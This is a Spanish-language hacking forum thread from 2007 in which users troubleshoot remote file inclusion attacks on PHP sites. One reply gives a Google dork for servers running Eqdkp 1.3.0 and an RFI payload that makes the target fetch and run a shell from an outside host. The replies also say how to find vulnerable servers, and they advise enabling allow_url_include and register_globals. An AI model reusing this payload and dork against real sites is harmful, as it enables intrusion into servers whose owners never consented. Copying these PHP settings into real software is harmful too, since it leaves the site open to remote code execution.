Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 30, 2008, 03:16:13
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: RFI duda 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: RFI duda  (Leído 280 veces)
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 16


Ver Perfil Email
« en: Noviembre 09, 2007, 03:12:04 »

Buenas tengo una duda con el rfi.
Primero, aveces cuando trato de atacar me sale por ej:

Citar
Warning: include(
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\index.php on line 2

Warning: include() [function.include]: Failed opening '
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 2

Y otras veces me pasa que, en vez de ejecutar el comando de la shell, me muestra el codigo fuente de la shell remota :S

Alguien sabe a que se debe ?

Salu2
En línea
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 225



Ver Perfil
« Respuesta #1 en: Noviembre 09, 2007, 04:53:10 »

Puede ser que no sea vulnerable a RFI.

Antes de tratar de meter la shell a lo loco, mira a ver si se te carga por ejemplo la página de google. Si es así prueba a ver si se te carga también cualquier página que sea algo.php. Si es así ya puedes meter la shell.
Al ejecutar la shell en el servidor remoto tienes q ejecutarla como .php.

Salu2
En línea

krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 16


Ver Perfil Email
« Respuesta #2 en: Noviembre 09, 2007, 05:39:40 »

Citar
Antes de tratar de meter la shell a lo loco, mira a ver si se te carga por ejemplo la página de google. Si es así prueba a ver si se te carga también cualquier página que sea algo.php. Si es así ya puedes meter la shell.

Si probe encontre un par pero a la hora de llamar la shell no va.
Y lo que es raro es que casi ninguna es vulnerable, esto es comun ?
Y la otra cosa, es que lo raro tmbn es que supuestamente yo cree, una web mediante el apache, vulnerable a estos ataques y me tira lo mismo que en muchas webs:
Citar
Warning: include(
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\index.php on line 2

Warning: include() [function.include]: Failed opening '
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 2

Citar
Al ejecutar la shell en el servidor remoto tienes q ejecutarla como .php.

No porque si la ejecuto como php se ejecuta en mi server.

Salu2
En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 80



Ver Perfil Email
« Respuesta #3 en: Noviembre 10, 2007, 01:38:44 »

Citar
lo raro tmbn es que supuestamente yo cree, una web mediante el apache, vulnerable a estos ataques y me tira lo mismo que en muchas webs:
Citar
Warning: include(
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\index.php on line 2

Warning: include() [function.include]: Failed opening '
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 2

Buenas... krosty478222.

Ese error lo que indica es que no se pudo incluir el HTTP, chequea si tienes el php.ini de tu servidor bien configurado para el RFI e incluir las URLs, para eso ve que tengas activas (en On) estas funciones:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On

; Whether or not to register the EGPCS variables as global variables.  You may
; want to turn this off if you don't want to clutter your scripts' global scope
; with user data.  This makes most sense when coupled with track_vars - in which
; case you can access all of the GPC variables through the $HTTP_*_VARS[],
; variables.
;
; You should do your best to write your scripts so that they do not require
; register_globals to be on;  Using form variables as globals can easily lead
; to possible security problems, if the code is not very well thought of.
register_globals = On

Si no las tienes en On, ponlas y reinicias la computadora para que los cambios surjan efecto.

Citar
Y lo que es raro es que casi ninguna es vulnerable, esto es comun

Si, es común que paces horas buscando servidores vulnerables y no los encuentres. Lo ideal es buscar servidores que allan instalado algún software que venga con los códigos vulnerables a RFI. Por ejemplo, en lugar de buscar en google por "allinurl:index.php?page=", puedes intentar buscar servidores que tengan instalado el powered by Eqdkp 1.3.0... Una forma seria asi:
en google colocar: powered by Eqdkp 1.3.0
RFI: /includes/dbal.php?eqdkp_root_path=http://www.tuweb.com/shell.txt
A mi ese método me resulta más efectivo a la hora de encontrar servidores vulnerables a RFI.

También puedes visitar
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
este
tema que trata sobre el RFI.

Un salu2 xD
« Última modificación: Noviembre 11, 2007, 03:19:45 por Socket_0x03 » En línea

vef
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil
« Respuesta #4 en: Noviembre 11, 2007, 03:32:54 »

A mi me pasa lo mismo que a krosty

pero ademas me sale un 3º mensaje
"Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\AppServ\www\index.php on line 2"

No encuentro el php.ini dentro de la carpeta appserv. Algien sabe como se configura lo que dijo socket para appserv?

PD: estuve mirando el manual de socket y si que me sale lo del "hola mundo" pero al poner la pagina del google me sale ese problema...
« Última modificación: Noviembre 11, 2007, 03:34:59 por vef » En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 80



Ver Perfil Email
« Respuesta #5 en: Noviembre 11, 2007, 03:47:30 »

A mi me pasa lo mismo que a krosty

pero ademas me sale un 3º mensaje
"Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\AppServ\www\index.php on line 2"

No encuentro el php.ini dentro de la carpeta appserv. Algien sabe como se configura lo que dijo socket para appserv?

PD: estuve mirando el manual de socket y si que me sale lo del "hola mundo" pero al poner la pagina del google me sale ese problema...

Buenas... vef.

Ese tercer mensaje significa que tienes que habilitar las URLs en el php.ini, para eso se realizan las mismas configuraciones que explique anteriormente (poner en on allow_url_fopen y allow_url_include en el php.ini).
Respecto a lo del php.ini ve a este directorio C:\appserv\php5\php.ini
Si no lo tienes en ese directorio quiere decir que tienes que crearlo, eso se hace renombrando el archivo php.ini-dist por php.ini

Un salu2 xD


« Última modificación: Noviembre 11, 2007, 04:02:56 por Socket_0x03 » En línea

vef
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil
« Respuesta #6 en: Noviembre 11, 2007, 04:12:46 »

Estuve buscando y lo encontre en la carpeta de Windows xD ya lo edite y ya me abre el google xD lo raro es que no me salen las imagenes... (los .gif de la palabra google) voy a acer lo que pusistes de renombrar y poner como php.ini

weno voy a segir provando...  Wink

Por cierto una cosa q queria preguntar (no es sobre rfi) todo esto lo estoy haciendo poniendo lo de localhost, es decir:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion, me cree un dominio en no-ip y querria poner esa direccion como direccion del server, lo intente pero al pner por ejemplo:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.vef.no-ip.org/index.php
me da error como de que no encuentra. Es raro porque hice ping a mi direccion y si que la encuentra (me sale mi ip) pero si hago ping a
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.vef.no-ip.org/index.php
tampoco lo encuentra...
« Última modificación: Noviembre 11, 2007, 04:25:58 por vef » En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: RFI duda « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC